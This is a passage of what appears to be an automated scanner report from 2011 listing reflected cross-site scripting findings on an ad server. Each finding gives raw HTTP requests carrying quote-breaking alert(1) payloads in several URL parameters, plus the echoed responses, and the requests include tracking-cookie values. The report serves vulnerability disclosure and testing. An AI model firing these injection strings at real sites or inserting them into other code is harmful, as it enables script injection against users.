Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:31:03 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:31:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6789
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 67733%3B0-0%3B0%3B57514523%3B933-120/600%3B40789782/40807569/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=362c27'-alert(1)-'c032322ba12&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2983634%26camid%3D5095412%26plaid%3D57514523%26creid%3D40789782%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww.veriz ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dad7c"-alert(1)-"cc5c582c61a was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0dad7c"-alert(1)-"cc5c582c61a&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:16:55 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:16:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0dad7c"-alert(1)-"cc5c582c61a&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den"); var fscU ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 196a4'-alert(1)-'232e8879f was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0196a4'-alert(1)-'232e8879f&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:16:59 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:16:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6122
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3ad0/f/7c/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0196a4'-alert(1)-'232e8879f&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den\"> ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 406a9'-alert(1)-'46cf963601 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=406a9'-alert(1)-'46cf963601 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6072
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 17:18:25 GMT
Expires: Sun, 20 Mar 2011 17:18:25 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ad0/7/7d/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=406a9'-alert(1)-'46cf963601https://chrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc?utm_source=en-oa-na-us-N5295.150800.VALUECLICK&utm_medium=oa&utm_campaign=en\"> ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89a5d"-alert(1)-"fcb19aa1da5 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=89a5d"-alert(1)-"fcb19aa1da5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6076
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 17:18:21 GMT
Expires: Sun, 20 Mar 2011 17:18:21 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ad0/7/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=89a5d"-alert(1)-"fcb19aa1da5https://chrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc?utm_source=en-oa-na-us-N5295.150800.VALUECLICK&utm_medium=oa&utm_campaign=en"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9246"-alert(1)-"5a9c202837b was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3f9246"-alert(1)-"5a9c202837b&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:15:29 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:15:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3f9246"-alert(1)-"5a9c202837b&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3De ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90ca9'-alert(1)-'3b957cae5d0 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=390ca9'-alert(1)-'3b957cae5d0&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:15:33 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:15:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=390ca9'-alert(1)-'3b957cae5d0&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3De ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14d97'-alert(1)-'85cdf973d14 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=53925114d97'-alert(1)-'85cdf973d14&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:14:50 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... //ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=53925114d97'-alert(1)-'85cdf973d14&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f83c6"-alert(1)-"cb65c717218 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251f83c6"-alert(1)-"cb65c717218&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:14:46 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... //ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251f83c6"-alert(1)-"cb65c717218&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec0e7'-alert(1)-'221eec829b was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857ec0e7'-alert(1)-'221eec829b&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:16:16 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:16:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6126
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ck.net/click%3Bh%3Dv8/3ad0/f/7d/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857ec0e7'-alert(1)-'221eec829b&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den\"> ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28d80"-alert(1)-"d667948a37d was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=4785728d80"-alert(1)-"d667948a37d&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:16:12 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:16:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ck.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=4785728d80"-alert(1)-"d667948a37d&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den"); var ...[SNIP]...
The scanner labels this injection point the sz request parameter, but the request shows the payload ff1ca"-alert(1)-"487523993d2 appended to the cid value inside the nested click= URL (cid=288503ff1ca"-alert(1)-"487523993d2). That value is copied into a JavaScript string which is encapsulated in double quotation marks, and the input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503ff1ca"-alert(1)-"487523993d2&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:14:16 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503ff1ca"-alert(1)-"487523993d2&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26u ...[SNIP]...
The scanner attributes this reflection to the sz request parameter, but in the request below the payload 27e79'-alert(1)-'ef9404d6e79 sits in the cid component of the URL carried in the click parameter. The response copies it into a JavaScript string which is encapsulated in single quotation marks. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=28850327e79'-alert(1)-'ef9404d6e79&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:14:20 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6130
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=28850327e79'-alert(1)-'ef9404d6e79&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26u ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60aad'-alert(1)-'e72e3365ae1 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
